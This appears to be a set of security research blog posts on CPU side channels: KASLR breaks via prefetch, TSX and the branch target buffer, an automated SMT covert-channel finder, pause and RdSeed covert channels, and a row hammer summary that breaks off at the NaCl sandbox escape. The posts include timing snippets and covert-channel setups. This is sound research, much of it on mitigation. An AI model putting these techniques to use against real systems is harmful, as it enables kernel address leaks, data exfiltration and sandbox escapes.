The fourth and fairly different attack came using the Branch Target Buffer, BTB. Evtyushkin, Ponomarev & Abu-Ghazaleh [5] found out that intel caches branch targets in order to better branch prediction in BTB. Correctly predicting branches is important to performance because a failure to predict correctly will under utilize the entire instruction pipeline. Intel however is cheap with the bits and uses only the lower 31 bits to store a branch target in the cache. Since KASLRis typically build on entropy in the lower 31 bits and these bits are shared between kernel and user mode, an attacker can cause conflicts. These conflicts will cause measurable timing differences.

Features

Despite the first three methods evolving around the same theme they do have significantly different advantages and caveats. The unique BTB method obviously also have diverging properties. I shall stress the advantages and problems of each vector using Hund, Willems & Holz paper [9] as a baseline. This classical method now appears mostly obsolete. That said I consider the paper a milestone for many reasons and it’s well worth a read.

The Advantages of the prefetch vector

Using the prefetch instruction is, as noted above, faster and more reliable. Not only does it make it more reliable, but also more accurate. Without the noise one can spot a timing difference depending on the level in the page table hierarchy an abort was caused. This allows an attacker to efficiently map out the entire address space top down starting out with 1 gigabyte regions. Further the prefetch instruction actually ignores the page table security settings and prefetches an address into a cache. This allows an attacker to recover physical addresses and by pass SMEP & SMAP when the operating system is using a direct mapping. The prefetch instructions are available on all current CPU’s, as they were introduced back in 1998.

The TSX vectors’s advantages

Like the prefetch attack, no fault handler is called and consequently the attack has significantly reduced the noise. The TSX attack, unlike the prefetch, can trigger code access through execution using a jump or call instruction. This has significantly different timing properties and consequently allows the attacker to distinguish between code and data. As a downside it cannot use the cache loading properties of the prefetch instruction. A major drawback of the TSX vector is the installed base of TSX which is somewhat limited. It was officially introduced with Haswell micro architecture. To this day TSX is only available in high end computers: some I5, I7 and xeon’s. This does not yet include the U series which is the most popular processor for notebooks.

BTB

The BTB attack is probably the most limited attack, as it is only able to locate code and data where branches give away the address. For all its limits in this regard it is probably the fastest of the attacks. Further Felix Wilhelm [11] showed that since the attack does not rely on page tables, it translates to host-KASLR breaks too.

Software Mitigation

Intel has in the past not been prone to do anything about micro architectural attacks and consequently I have significant doubt that they will with KASLR attacks. In fact the segment limits that were part of the x86-32 architecture would be a shop stopper for the first three attack vectors, but was removed for performance with x86-64.

It is often suggested to make the timer (RDTSC(p) ) less accurate will mitigate micro architectural attacks which covers all 4 attacks vectors here. The cost is obviously some implementation overhead and a less accurate timer for benign purposes. It could be implemented through the CR4.TCD bit for bare metal operating systems or setting up the MSR’s to get a VMEXIT in hypervisor environments. These cost seems reasonable to me – I’ve yet to hear a convincing argument why user mode applications in general, need such timing accuracy and I never heard a convincing argument that any application would be significantly slowed down by the overhead required to get less accuracy on RDTSC(p) instruction. That said lower timing accuracy is not a good mitigation in cases where an attack can be repeated. The reason is that once an attacker can repeat a timing attack, he can use the law of large numbers to cancel out any noise or bias added to the timer. For KASLR attacks, there is little reason why an attacker cannot repeat the attack and in fact the Hund, Willems & Holz [9] attack does this to great effect, not because of a noisy timer, but because a the noise added by the page fault handler. I thus think it’s safe to conclude that a noisy timer cannot be a solution to KASLR micro architecture attacks.

The Hund, Willems & Holz [9] attack is fairly easy to mitigate. Since they actually trigger a page fault, one has a nice call back in the page fault handler. A few lines of code can use client CS and error code on the stack and the linear address in CR2 to check if a user mode program tried to access kernel memory and respond accordingly. As this event should be really rare, the response can be anything from causing a large delay making the attack impractical or shutting down the application.

The in Jang et al. [2] version of the TSX attack ,DrK, use page mapping (number of continuously mapped pages) and page attributes to identify modules. This can easily be thwarted by mapping unused pages in the driver region to a single PFN with only null data. The cost shouldn’t be too bad as only one PFN needs to be referenced mapped from a number of PTE which to some extend can use existing PDE’s. Exactly how many additional PDE’s would be needed to thwart the DrK would be a tuning parameter. This method would also slow down the prefetch attack, however currently it uses a function call to load the caches and thus cannot be completely thwarted in this fashion. It is likely that the TSX vector could be made to work in a similar fashion.

Both the TSX vector and the BTB vector is vulnerable to performance counter detection as there are currently performance counters that maps to micro events caused by the attack. Say for instance the detection I suggested for the Flush+Flush [7] attack could easily be modified to detect both these attacks. The prefetch attack however, does not seem to have a performance counter event that correlate sufficiently with the attack. The performance counters on software prefetch’s was discontinued and remapped with the by now very old Silvermont generation of processors. These kinds of detections are unfortunately either high-overhead or false positive prone. Consequently they don’t off themselves as general solutions, but rather of a close gap nature. Without a good performance counter mapping to the prefetch instruction, reliable detection would likely be prohibitively expensive performance wise using these methods.

The BTB and TSX vectors offer other ways of detection. In particular it seems likely that both will generate activity in the Last Branch Record (LBR) stack. If one were to instrument the RDTSC(p) instruction, as suggested above, the distance between the last RDTSC(p) instruction and the current combined with the LBR would provide clues to nefarious activity quite possibly at a fairly low cost.

More promising is a BTB only trick that relies on the very thing that makes the BTB attack work in the first place. The BTB vector works because only the lower bits are used to store the branch target and thus you get conflicts between kernel and user mode branches. Interestingly this conflict consequently only gives you information on the lower 31 bits and Evtyushkin and Ponomarev [5] notes that using the upper bits for KASLR thus remains a solution. Using all the remaining addressing bits f or KASLR seems a good idea, however all modern operating system sorts different types of code and data into blocks and partically uses these blocks to identify maglinant behavior. For instance drivers in Windows are loaded between 0xFFFFF800’000000000 and 0xFFFFF8FF’FFFFFFFF. Thus to minimize changes to this general structure using only the upper 9 bits (the PML4 bits) would probably be the easiest solution. This would give you 256 different locations which the BTB method could not tell apart (the top most bit is used to distinguish between kernel mode and user mode). Not much, but an attacker is unlikely to get away with causing a machine a 100 times to get it right be random. In fact Windows 10 Anniversary Edition does this for PTE’s, but not for code. See Economou [10] for more info.

The three vectors based on actually accessing kernel memory can be mitigated through address space separation. By treating kernel mode as a separate “process” and swapping the CR3 register immediately after/before a ring change, one can effectively block these attacks. Depending on the amount of ring switching going on, an operating system are looking at about 5% over head as switching the CR3 registers are expensive in and of itself and because it invalidates the paging caches. Both Yang et al [2] and Gruss et al. [6] mentions this method.

A mitigation that I considered for thwarting the BTB attack was flushing the BTB itself, by systematically doing a number of jmp instructions on switching back into user mode. This method is likely to have too much performance overhead to be practical. The reason for this method is the size of the BTB, which Godbolt [4] estimates the BTB in his Haswell to be 2048 entries large – thus requiring 2048 dummy branch instructions on every transition into user mode.

Conclusion

The natural question, which of these methods is the best, is a misunderstood question. While the first method appears obsolete by now, the other 3 methods have different advantages and disadvantages. They base themselves on at least 2, but probably at least 3 different side channels in the CPU and thwarting all four attacks seems like a difficult undertaking. Personally I find it likely that there are more leaking in the processor to be found – maybe I’ll write about that another time. The natural conclusion is that KASLRfor bare metal operating systems seems to be broken for defending against privilege escalation mounted from native code. The caveat here is the “from native code part”. Classical data based attacks, such as a font attacks of the past cannot be doctored to break KASLRusing these micro architectural attacks. Before I cry any crocodile tears ,I should note that KASLR was always a stop gap solution and consequently mitigations become mitigations for a mitigation. The real problem being bugs in kernel mode – though very difficult to fix all kernel mode bugs, minimizing code in the kernel and improving kernel mode code quality must remain the focus of making the kernel secure.

Literature

[1]A Barresi , K Razavi, M Payer, T Gross: “CAIN: Silently Breaking ASLR in the Cloud“ – https://nebelwelt.net/publications/files/15WOOT.pdf

[2] Y Jang, S Lee, T Kim , “Breaking Kernel Address Space Layout Randomization with Intel TSX”

– Proceedings of the 23rd ACM Conference on Computer and Communications Security

[3] R Wojtczuk.” TSX Improves Timing Attacks Against KASLR.” https://labs.bromium.com/2014/10/

[4] M Godbolt. “The BTB in contemporary Intel chips.” http://xania.org/201602/bpu-part-three

[5] Evtyushkin D, Ponomarev D, Abu-Ghazaleh N. Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR. InProceedings of 49th International Symposium on Microarchitecture (MICRO) 2016.

[6] D Gruss, C Maurice, A Fogh, M Lipp, S Mangard . “Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR.” Proceedings of the 23rd ACM Conference on Computer and Communications security 2016

[7] A Fogh. “Detecting stealth mode cache attacks: Flush+Flush. http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] A Fogh: “Breaking KASRL with micro architecture Part 1”, http://dreamsofastone.blogspot.de/2016/02/breaking-kasrl-with-micro-architecture.html

[9] R Hund, C Willems, T Holz. „Practical timing side channel attacks against kernel space ASLR” Security and Privacy (SP), 2013 IEEE Symposium on, 191-205

[10] N Economou. “Getting Physical: Extreme abuse of Intel based Paging Systems” -https://blog.coresecurity.com/2016/08/25/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-3-windows-hals-heap/

[11] F Wilhelm “mario_baslr” https://github.com/felixwilhelm/mario_baslr/

Covert Shotgun

Automatically finding SMT covert channels

Introduction

In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar a covert channel is a side channel where the attacker has an implant in the victim context and uses his channel to “smuggle information” in and out of the victim context across existing security boundaries.

In this blog post I’ll explore how we can automate finding SMT covert channels. SMT is intel speak for hyper threading.

Before I proceed I should note that one of the two covert channels I found in my last blog passed, the one based on the RdSeed instruction, appears also to have been found by others. You can read about it in D. Evtyushkin & D. Ponomarev [1]. They will be presenting their work on this channel at CCS. Unlike myself they develop the channel fully and discuss mitigations. So if you find this channel interesting their paper is well worth a read.

SMT and side channels

For a long time, I’ve wanted to look for side channels in SMT. SMT is the technical name for hyper threading. Back in Pentium 4 Intel figured that most stuff that goes on in a CPU core is used relatively seldom, so they had the idea that you could run two hardware threads in the same core if you duplicate only the most important subsystems of the core. The remaining subsystems would be shared between the two hardware threads. In the event that the two threads simultaneously want to use a shared subsystem, one would just have to wait. In short you gain significant amount of performance, for a little bit of infrastructure. The problem is if you read what I just wrote sideways, it got “side channel” stamped all over it. In fact, there has been a number of example of side channels related to SMT found in the past. For instance, Acıiçmez and J.-P. Seifert [2], D’Antoine [3] and my last blog post had neat little SMT side channel in the pause instruction – just to mention a few.

Covert Shotgun

The pause side channel I found by reading the intel optimization manual. This is the kind of work one usually do to find these critters. Sort of like a sniper looking for targets. But I figured it might be possible to automate the process – more like shooting a shotgun and hope you hit something. Hence my tool for doing so Is called covert shotgun.

The basic idea is if you have 3 instructions. One that you measure the latency of and two which you use to send a signal. The instruction where you measure the latency I call the receiver instruction. Of the two signal instructions one must use a subsystem that is not used by the receiver instruction, whereas the others should not. The receiver’s instructions latency will tend to be smaller when subsystems aren’t shared and we can encode this smaller latency as a 0 bit. To automated the process shotgun picks 3 instructions from a list of interesting instructions, measures latency on receiver instruction while running the two signal instructions respectively.

To implement this, I use the keystone assembler engine to generate receiver and signal code. The signal code is optimized to maximize pressure on any subsystem used by signal instruction:

A:

<signal_instruction>

<signal_instruction>

<signal_instruction>

<signal_instruction>

<signal_instruction>

Jmp A:

I repeat the instruction 5 times to minimize the effects of the jmp instruction. The receiver instructions latency is measured like this:

Cpuid

Mfence

Rdtscp

Mov rdi, rax

<receiver instruction>

rdtscp

sub rax, rdi

ret

With a list of instructions, I can pick a receiver instruction and two signal instructions and test the receiver with both signals. If there is a significant difference, I have a manifestation of a covert channel. Covert shotgun uses plain brute force on the list which makes it really slow and stupid (N² tests) – but for small lists works well enough.

As for what makes out a significant difference my initial idea was to do a classic P-test on 1.000.000 time samples to determine if there was statistical evidence to conclude there was a channel. This turned up side channels that probably really does exists, but would be thoroughly impractical due to noise. The modified check is an average timing difference of at least 1 clock cycle or 1 standard deviation whichever is larger. Where I estimate the standard deviation the square root of the sum of the sample variance of the two. This insures should insure that the channel is practical. I acknowledge that the standard deviation estimator isn’t “blue”, but given the ad hoc nature of “practicality measure” it is not an issue.

Now the smart reader would’ve noticed I used the wording “manifestation of a covert channel”. I generally tend to only count something as a separate side channel if the system where the contention is caused is unique. With this method method we are likely to find several manifestations of the same side channel. However, it’s worth noting that different manifestations might have different properties and consequently any manifestation could turn out to be useful. For example, flush+reload and flush+flush would under this definition be the same side channel. But Flush+Flush is faster and is more stealthy than flush+reload. See my previous blog post on cache side channel attacks [4] and Gruss et al [5] on flush+flush.

Also worth noting is that cover shotgun will only find side channels of the instruction timing type, and only when the instruction parameters are inconsequential. Finding a side channel like flush+reload or even flush+flush is not possible in this fashion.

Strictly speaking cover shotgun can find covert channels cross core. The reality of it is that cross core covert channels of the instruction timing type is rare. I’ve only found the RdSeed channel so far.

The hardware

harddiagram

A priori I expect a significant amount of covert channels. To understand my a priori expectation let’s spend a second reviewing some hardware design. Below is a very simplified “map” of the instruction execution logic in my Broadwell intel cpu’ Specifically, I’ve tried to simplify by remove the memory subsystems from the diagram as covert shotgun currently is not usable to analyze this subsystem. Further I’ve sanitized the registers away for simplicity as they are not important for covert shotgun to the extent that registers are duplicated for the two threads.

The first step in execution is parsing instructions into myOp. There is a cache for myOp instructions which could probably be used for cache side channels – if I recall correctly I saw a paper on it. Covert shotgun currently only uses a handful of instructions at once and thus is unlikely to be able to find side channels in this cache. The cache however is particularly interesting as it would give information on instructions in the cache.

Once parsed the myOps are reordered to maximize parallel execution.

The reordered myOPs then enter a queue for the ports. Intel speak for this queue is unified reservation station or sometimes just reservation station. Intel architecture connect individual execution units through these ports.

Each port is capable of handling only one myOp per cycle meaning that it’s fairly easy to run into congestion in the ports. Each of the 8 ports is connected to up to 7 individual execution units which each executes particular specialized tasks. Some execution units are duplicated and available on multiple ports, some execution units are available on only one port – this very well reflects that the CPU was designed for hyper threading. This would lead us to expect to find a high number of manifestations where the receiver instruction and 1-bit sender instruction are identical – with reordering and multiple execution units making sure that it occurs less than 100% of the time. For 0-bit instructions we’d expect a speedup when running parallel with itself. The main point of congestion is probably through the congestion in the individual execution engines – especially those who are not duplicated.

Until Haswell intel had 6 ports and Haswell added an additional 2 ports, going to a total of 8. This allows further parallelization of execution. I think Sky lake added even more ports and duplicated an integer execution unit for better parallelization’s of integer and vector instructions, but I’m not sure. More parallelization typically means less covert channels. These changes should serve as a reminder that the covert channels you find on say a Broadwell, need not exist on a Sandy Bridge and vice versa even when the instructions exist on both. The microarchitecture is subject to change and these changes has significant effects on covert channels and other micro architectural attacks.

Results

Due to the N²nature of “covert shotgun” I ran a small list of 12 instructions where some were picked because I suspected covert channels in relation to them, and some were chosen because I found the particularly likely to be boring. The list of instructions

Instruction	My reasoning
RdSeed rax	Pretty slow, thus like a “0” signal instruction
Pause	The most likely “0” signal instruction
Nop	Does it get anymore benign?
Xor eax,eax	I used it in my last blog
Lea rax,[4rax+edi+40960];lea rdx,[8eax+rdi+409623]	I suspected I might get into trouble with the Address generation unit, by using SIB bytes, two instructions and a constant bigger than 2048.
RdRand rax	Sounded interesting
Add rax,1
Bts rax,1
Bt rax,1	Wanted to check too near identical instructions against each other
Cpuid	An interesting instruction on any day
Movq xmm1, xmm2	Streaming instructions must be tested
Vtestps ymm1, ymm2	More streaming instructions…this time 256bit wide

Running these 12 instructions in brute force meant testing for 936 covert channels. In these I found 521 practical covert channel manifestations. That’s a whooping 55%. Now I expected there to a be a lot of manifestations in there, but this magnitude surprised me. Personally I don’t think the detailed results are that interesting. The thing is that I think SMT in and of it’s own should be considered the side channel here as opposed to considering congestion in subsystem below the SMT as the core reason. However, I will give you a summary of a few interesting finds below.

covershotgunmatrix

RdSeed turned out to be an extraordinary good “0” signal bit. All instructions run faster in parallel with this instruction than other instructions. No less than 46 of the covert channel manifestation was with RdSeed. With the RdSeed taking around 300 Clk’s to finish, it is likely that this instruction to a very large extend does not interfere with the execution of other instructions, leaving every shared resource mostly free for maximum speed. The pause instruction has the same effect, but not quite as strong and not quite as surprising as RdSeed (Part of the reason for the pause instruction is to yield for the other hw thread). Most likely it’s because the pause instruction has significantly lower latency on my computer and thus more overhead than the RdSeed. If I recall correctly the pause instruction pauses significantly longer on skylake. Interestingly enough the RdSeed instruction also have a significant speedup effect on itself. In my estimation it’s a faster speed up than can be explained with in the pipeline and the most likely reason for the speed up is due to the “seeding unit” being busy and the instruction thus terminating early.

Most of the 1-bit signal instruction instructions does seem to have a high latency when paired with itself than with the average instruction in my test. With the limited number of instructions and the serious selection bias involved I advise against any conclusion.

Unfortunately, I messed up the “lea” test in that I had dependency between the two lea’s and consequently I need to rerun the test. Rerunning the test with lea’s without dependencies did not appear to change the results significantly.

Future research

It would be interesting to run covert shotgun (Preferably made a bit smarter) on much larger lists of instructions to get a much better overview of the situation. Another interesting project would be identifying the subsystem which are being congested by specific instructions. A good starting point would be Agner Fog’s instruction tables[6] and the associated software. This software leverages performance counters to identify port usage and lots of other juicy instruction information.

Further it would be interesting to investigate to what extend these covert channels extend to spying. Especially I found the covariance in instruction timing between different instructions really interesting – there certainly are patterns in there. They suggest that you have congestion on multiple subsystems and perhaps – just perhaps – there is enough data in that to finger print code across SMT. That would be especially interesting say in a SGX scenarios or would lead directly to spying in branched victim code.

A word on microarchitecture timers

Most side channel attacks are timing attacks and thus subject to mitigation through modified timers either by intention or in cases where a hypervisor for other reasons decided to get a VMExit on Rdtsc instructions. For this reason, I’ve been searching for a fast timer that isn’t rdtsc and so far not found one. A natural candidate would be a fast loop synchronized through either overt or covert access. Overt access through memory access was in my experiments too slow to useful. Probably the reason is that a store operation is required that triggers a cache coherency action. So I wanted to see if the RdSeed channel could be used. Unfortunately, the answer is a clear no with RdSeed taking upwards of 200 CLK’s and micro architectural attacks often require accuracy below 70 CLK’s. That said – I have this other idea which I hope I’ll get around to soon

Conclusion

Despite my limited time with covert shotgun it’s has shown great potential. Also I think this simple experiment efficiently shows the dangers of SMT if it wasn’t clear to everybody already. In my opinion it’s justified to talk about SMT being the core cause of all these side channels (and other SMT channels as well) and consequently it’s not very useful to talk about “a pause side chance” as a separate side channel, but as a manifestation of the SMT side channel. With the number of manifestations and different available subsystem the only reasonable mitigation left against these covert channels seems to turn off SMT entirely in threat models that includes attackers having an implant in your VM. Personally I think the root cause is that the attacker is in your VM in the first place. If these methods can be used for spying it is very likely that some can be implemented in java script and thus be used for remote attacks.

[1] Dmitry Evtyushkin, & Dmitry Ponomarev , “Covert Channels through Random Number Generator: Mechanisms, Capacity Estimation and Mitigations”hhttp://ttp://www.cs.binghamton.edu/~dima/ccs16.pdf

[2] O. Acıiçmez and J.-P. Seifert., “ Cheap Hardware Parallelism Implies Cheap Security. Fault Diagnosis and Tolerance in Cryptography” (FDTC’07), pages 80-91, IEEE Computer

Society, 2007.

[3] Sophia M. D’Antoine, “Exploiting processor side channels to enable cross VM Malcious Execution”. http://www.sophia.re/SC/thesis.pdf

[4] Anders Fogh, “Cache side channel attacks”,http://dreamsofastone.blogspot.de/2015/09/cache-side-channel-attacks.html

[5] Daniel Gruss, Clémentine Maurice & Klaus Wagner(2015): “Flush+Flush: A Stealthier Last-Level Cache Attack”, http://arxiv.org/pdf/1511.04594v1.pdf

[6] Fog, Agner, “4. Instruction tables “ http://www.agner.org/optimize/instruction_tables.pdf

Two covert channels

Introduction

Too much WinWord. Too much Tex. Too many meetings. Too little CPU. It was time for a short pause from the grind and dig into some tetravalent metalloid. My current project was too big a mouthful to get into before going to Black Hat, so I dug up a pet project to play around with. And then it happened – I needed some info from the intel documentation and before you know it had what I believe is a new side channel in my head. Then a second one. Then a third. Two of these side channels looked like they would make for good arguments for a point I’ve been meaning to make. The third is more complex and it might be fairly useful. Consequently, I decided to write this small blog post on the two first side channels and make my point. Both of these side channels are technically interesting, however only the second is likely to be of any practical importance. I have not spent too much time or effort researching these channels as they are just a side project of mine. Beware: I’ve not checked the literature for these two particular channels, so I might be repeating other people’s research. I do not recall having read anything though.

Not all side channels are equal

Not all side channels are created equal. Some are inherently more powerful than others. However, there is no good way to measure how good a side channel is – it simply often comes down to the subjective question of what do an attacker need the channel for.

The simplest use for a side channel is the so called covert channel. Most microarchitecture side channels can be used to communicate between two trust domains when an attacker has access to both. An attacker can use covert channels for data exfiltration. The most important two reasons are to stay hidden or because regular channels are not open. An example of a covert channel would be an implant on a virtual machine in the cloud that communicates through, say a cache side channel, with another VM on the same physical computer. In this scenario the attacker doesn’t leave any TCP/IP logs and can communicate with his C2 server despite the defender turning off his network adapter.

While most microarchitecture side channels can be used as a covert channel, some side channels provides insights into normal system behavior and thus are powerful enough to be used for spying even when the attacker does not have access to both attacker and victim’s trust domain.

In this blog post we’ll be looking at two side channels which falls into this category of side channels, which are mostly irrelevant for spying but useful for covert channels. Since these channels are probably limited in this way I have refrained from researching them very deep. The point of this blog isn’t the two new side channels, but a different one. However both side channels are from a technical view point interesting. The second side channel might even be practical.

Time for a pause – side channel with the pause instruction

Being old one forgets the name of the instructions from time to time and I needed a pause instruction and was searching for “wait”. Anyhow I picked up the optimization guide because I know the right name would be in there. And so it was, but then I read the description again and found the pause instruction has a profound impact on hyper threads because it does not significantly block resources of the other hw thread on the computer. But that has probably been utilized by somebody already. But more interesting if two hyper threads both use the pause instruction simultaneously power can be saved. One has to wonder if that makes difference in the execution time of the pause instruction. And it does. But the story is longer. The latency of the pause instruction is heavily dependent on power management settings and the current activity of the computer. So the channel depends on those settings. Further Intel has been tinkering with the pause latency, so you’re likely to see different results on different computers. My results are from an I3-5005U, I did not test on other computers. My power settings where “Balanced”. Notice we are talking about a laptop here, which might be important too. Below a plot of latency measurements of the pause instruction with a core-co-located thread doing a loop of pause instructions and with a identically co-located thread doing a normal integer operation (xor eax,eax – did test with other instructions with similar results). The plot is for a loop of 40.000 measurements.

pause_latency

Usually we’d expect a speed up when a collocated hw-thread would pause, because the thread effectively yields all resources to the other hw-thread in the core and in the meassurements there is a bit of overhead that could be sped up. However we are seeing the exact opposite. I can only speculate about the reason, but it seems likely that with both co-located hw-threads in pause mode, the entire core goes into pause mode.That is the c-state of the core is increased and this comes at a small latency cost. Whatever the cause is, we have a measurable side channel. There is not much to spy on with this channel we could possibly spot when the kernel is doing a spinlock for some reason, but really juicy information does not seem to be a likely catch in the side channel. Since the channel depends heavily on power settings and on computer activity the channel might not be very useful in practice. Further the core-colocation requirement obviously detracts from value of the side channel. Also it’s a timing side channel using rdtsc(p) instruction which gives leverage for detection as well as mitigation through timing inaccuracy. In fact this attack would be difficult to get to run under VirtualBox (Ubuntu host) as this virtual machine is setup to cause a vmexit on rdtsc which makes the measurement of such small time differences difficult (Though not impossible). Even worse for the value of this side channel is that pause itself can be made to cause vmexit and thus be used for direct detection/mitigation of any pause based side channel attack. So while we have a side channel here, it’s not likely to be a very practical one.

Sowing a seed too many – side channel with rdseed

“Under heavy load, with multiple cores executing RDSEED in parallel, it is possible for the demand of random numbers by software processes/threads to exceed the rate at which the random number generator hardware can supply them. This will lead to the RDSEED instruction returning no data transitorily.”

That sounds like a very obvious side channel indeed. The RDSEED instruction has been added with the Broadwell micro architecture and uses heat entropy in the CPU to generate cryptographically strong random number. The problem with this instruction seems that for enough entropy to build up a bit of time is needed between calls to RDSEED. Thus intel designed the instruction to return an “error” using the carry flag if insufficient time has passed since the last call of RDSEED. So the basic idea is that an attacker could create a covert channel using this instruction. To send a 1 bit the sender implant loops an rdseed instruction and mean while the receiver runs a loop spaced with plenty of time between rdseed. The information is extracted in the recievesr’s end from a count of failed rdseed instructions. My simple test setup was an infinite sender loop which either called the rdseed instruction or not depending on the bit I wanted to send. My receiver looped 1000 times around did an rdseed instruction followed by a 10 ms Sleep() call. 0 bits caused zero failures in the receiver loop and typically around 800 failures in the 1bit scenario. I tested only on a I3-5005U Broadwell laptop, but with the sender and receiver thread pinned on same core as well as on different cores. Results where near identical.

This particular channel is interesting in so many ways, despite its limited use. It is a really rare thing that side channels in the CPU are not timing attacks based around the rdtsc(p) instruction. Infact I know of only one other attack: The instruction reordering attack of Sophia D’Antoine which if I understand it correctly is limited to scenarios that are not really reflective of the real world. This attack however works cross core without other limiting factors – however it’s limited to micro architectures that support the instruction which is only the newest intel CPU’s. Further it does not appear to cause any interrupt that would allow instrumentations and does not appear to be wired to performance counters that would allow detection thus making low impact software mitigation difficult. Finally, theoretically the channel could be used to spy on benign usage of the rdseed instruction, but probably wouldn’t gain much information.

The real point

The point of this blog isn’t that I found two new side channels. The point here is an entirely different one. The point is that I as a byproduct found at least two side channels in the processor of which at least one does not seem like it’s fixable in software. It might be in microcode, but I don’t think that’s relevant either. The point I wish to make is that with the amount of side channels already known and me finding two while not looking for them, it seems likely that there’ll be a great many side channels waiting to be discovered. Not to mention the likelihood that Intel will with time add new ones (recall the second side channel arrived with the Broadwell microarchitecture). Even if we knew all the side channels we’d be hard pressed to come up with software detection/mitigation and it seems unlikely that Intel will fix these side channels as they’ve not done so in the past. Consequently we should probably accept the fact that covert channels in cloud computing is a fact of life and consider them an unavoidable risk. This of cause does not mean we shouldn’t continue to find and document the channels, since our only defense against them is if malware analysts are able to spot one from a malicious implant.

Row hammer the short summary

Introduction

This is the first updated version of my original “Row hammer the short summary” blog post. As I had predicted the summer was going to be interesting in terms of row hammer and it certainly appears I was right about that. With so much going on I found it worthwhile updating this blog post to be in line with the latest developments and to fix up a few minor details.

Short version of how dram works.

Current DRAM comes in modules called DIMM’s. If you buy a modern memory module for your PC, you’re buying a DIMM. If you look at the DIMM most DIMMs will have chips on both sides. Each side of the DIMM is a rank. Each rank again consists of a number of banks. The banks are in the physical individual chips you can see. Inside a bank you’d find a two dimensional matrix of memory cells. There are 32k rows in the matrix and 16k or 512k cells per row. Each cell stores one bit and consists of a transistor for control and a capacitor which stores charge to signify bit is equal to 1 and no charge when bit is equal to 0 (on some chips the encoding is reversed). Thus a row stores 8kb or 64kb of data depending on the exact kind of DRAM you have in front of you. When you read or write from/to DRAM an entire row is first read into a so called so called row buffer. This is because for reading automatically discharges the capacitor and since writes rarely rewrite the entire row. Reading a row into the row buffer is called activating the row. An active row is thus cached in the row buffer. If a row is already active, it is not reactivated on requests. Also to prevent the capacitors loose charge overtime they are refreshed regularly (typically every 64 ms) by activating the rows.

Row hammer introduction

This section is based on [1] Kim et Al. where not otherwise noted.

When a row is activated a small effect is caused on the neighboring row due to so called cross talk effects. The effect can be caused by electromagnetic interference, so called conductive bridges where there is minor electric conductivity in dram modules where it shouldn’t be. And finally, so called hot-carrier-injection may play a role where an electron reaches sufficient kinetic energy where it leaks from the system or even permanently damage parts of the circuitry. The net effect is a loss of charge in the DRAM cell which if large enough will cause a bit to flip.

Consequently, it’s possible to cause bits to flip in DRAM by reading or writing repeatedly and systematically from/to two rows in DRAM to (active the rows) bit flips can be introduced in rows up to 9 rows away from these two “aggressor rows”. The 9 rows are called victim rows. The most errors happen in the row immediately next to an aggressor row. Picking the aggressor rows so they bracket a victim row is called double sided row hammering and is far more efficient that normal row hammering. Using two adjacent rows to hammer surrounding rows is called amplified single sided hammering and can be useful in exploitation scenarios. If the victim rows are refreshed before enough cross talk can be generated no bit flips is incurred. As a rule of thumb the higher the frequency of row activation the higher the probability of flipping bits.

It has been shown that bits can be flipped in less than 9 milliseconds and typically requires around 128k row activations. [3] Seaborn & Dullien has reported bit flips with as little as 98k row activations.

The problem occurs primarily with RAM produced after 2010. In a sample of 129 RAM modules from 3 manufacturers over 80% where vulnerable. With all modules produced after 2012 being vulnerable. [4] Lanteigne showed that DDR4 ram is vulnerable too with 8 out of 12 sampled DRAMs was subject to bit flips. Further this paper showed that certain patterns in the DRAM rows where more likely to cause bit flips.

[21] Lateigne concludes that AMD and Intel CPU’s are both capable of row hammering, but that the most bit flips are encountered when the methodlogy is adapted to the underlying memory controller in the attacked system.

Physical addressing and finding banks and row

Obviously to cause row hammering one needs two addresses belonging to rows in the same bank. [2] showed that repeatedly choosing two random addresses in a large buffer would in a practical amount of time belong to the same bank and thus be useful for hammering in software.

An optimal solution requires that the attacker has knowledge of physical addresses. Even with a physical address an attacker would need to know how they map to dimm, banks and rows to optimally row hammer. [5] Seaborn used row hammer itself to derive the complex function that determines physical address to dram location for a sandy bridge computer. [6] Pessl et al. showed how to use “row buffer side channel attacks” to derive the complex addressing function generically and provided maps for many modern intel CPU’s.

To obtain physical addresses the /proc/$PID/pagemap could provide this information. However, /proc/$PID/pagemap, which is not available in all operating systems and no longer affords unprivileged access in most operating systems that do support it. This problem for an attacker remains to be definitively solved.

Row hammering with Software

To cause row hammer from software you need to activate memory rows, that is cause reads or writes to physical memory. However modern processors are equipped with caches, so that they don’t incur serious speed penalties when memory is read or written. Thus to cause row hammering bit flips it’s required to bypass the caches.

[1] did this using the clflush instruction that removes a particular address from the cache causing the next read of the address to go directly to memory. This approach has two down sides. First, since clflush is a rare instruction, validator sandboxes (such as NaCL of google chrome) can ban this instruction and thus defeat this attack. Second Just-in-time compilers and existing code on computers generally do not use this opcode disabling attack scenarios where jit compilers are used (such as javascript) or for the future using existing code in data-only attacks.

[7] Aweke posted on a forum he was able to flip bits without clflush – he did not say how, but it was likely using the same method as [8] which systematically accessed memory in a pattern that causes the processor to evict the address of the attacker row from the cache causing the next read to go to physical memory. Unfortunately, how to evict caches is CPU dependent and undocumented and despite [8] Gruss, Maurice & Mangard mapping out how to optimally evict on most modern CPU’s it’s not the most trivial process. Typically, this requires knowledge of the physical address discussed above as well as a complex mapping function for cache sets. It is however possible to approximate this either through using large pages or through timing side channels. Also it is slower and thus less efficient than the clflush version above. Since this vector does not require special instructions, it’s applicable to native code (including sandboxed code), java script and potentially other JIT compiled languages.

[9] Qiao & Seaborn found out that the movnti instruction is capable of by passing the caches on it’s own. Further this instruction is commonly used – including as memcpy/memset in common libraries and thus difficult to ban in validator sandboxes and lowers the burden for future row hammer as a code reuse attack. It remains to be seen if JIT compiled languages can make use of it.

Finally, [10] Fogh showed that the policies that maintains the coherency of multiple caches on the CPU can be used to cause row activations and speculated it would be fast enough for row hammering. Since the coherency policies are subject to much less change than cache eviction policies and does not require any special instructions this method may solve problems with the other methods should it be fast enough. This remain to be researched.

Exploiting row hammer

[2] showed that row hammer could be used to break out of the NaCL chrome sandbox. The NaCL sandbox protects itself against by verifying all code paths before execution and block the use of undesired activities. To avoid new unintended code paths to be executed the sandbox enforces a 32 bit aligned address for relative jumps and adding a base address. In code it looks like this:

and rax, ~31a

add rax, r15  //(base address of sandbox)

jmp rax

